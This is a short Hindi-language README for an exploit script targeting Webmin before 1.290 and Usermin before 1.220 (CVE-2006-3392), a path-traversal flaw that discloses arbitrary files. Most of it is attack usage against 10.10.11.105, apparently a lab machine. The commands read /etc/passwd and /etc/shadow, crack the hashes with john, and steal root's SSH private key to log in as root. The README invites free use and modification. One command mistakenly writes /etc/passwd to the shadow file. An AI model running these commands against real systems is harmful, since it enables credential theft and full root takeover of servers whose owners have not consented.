
Webmin < 1.290 / Usermin < 1.220 - मनमाना फ़ाइल प्रकटीकरण
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin 1.290 से पहले और Usermin 1.220 से पहले HTML को डिकोड करने से पहले simplify_path फ़ंक्शन को कॉल करता है, जो रिमोट हमलावरों को मनमानी फ़ाइलें पढ़ने की अनुमति देता है, जैसा कि "..%01" अनुक्रमों का उपयोग करके प्रदर्शित किया गया है, जो फ़ाइलनाम से "%01" जैसे बाइट्स हटाए जाने से पहले "../" अनुक्रमों को हटाने को बायपास करते हैं। नोट: यह CVE-2006-3274 से भिन्न मुद्दा है।
रूट विशेषाधिकार के साथ फ़ाइल सिस्टम में किसी भी फ़ाइल को ब्राउज़ करें
./exploit.sh <target ip> <target port> <file to disclose>
10.10.11.105 पर passwd और shadow ब्राउज़ करें, unshadow करें और हैश क्रैक करें
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
10.10.11.105 पर निजी rsa कुंजी ब्राउज़ करें
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
आप जब चाहें और जहाँ चाहें उपयोग या संशोधित करने के लिए स्वतंत्र महसूस करें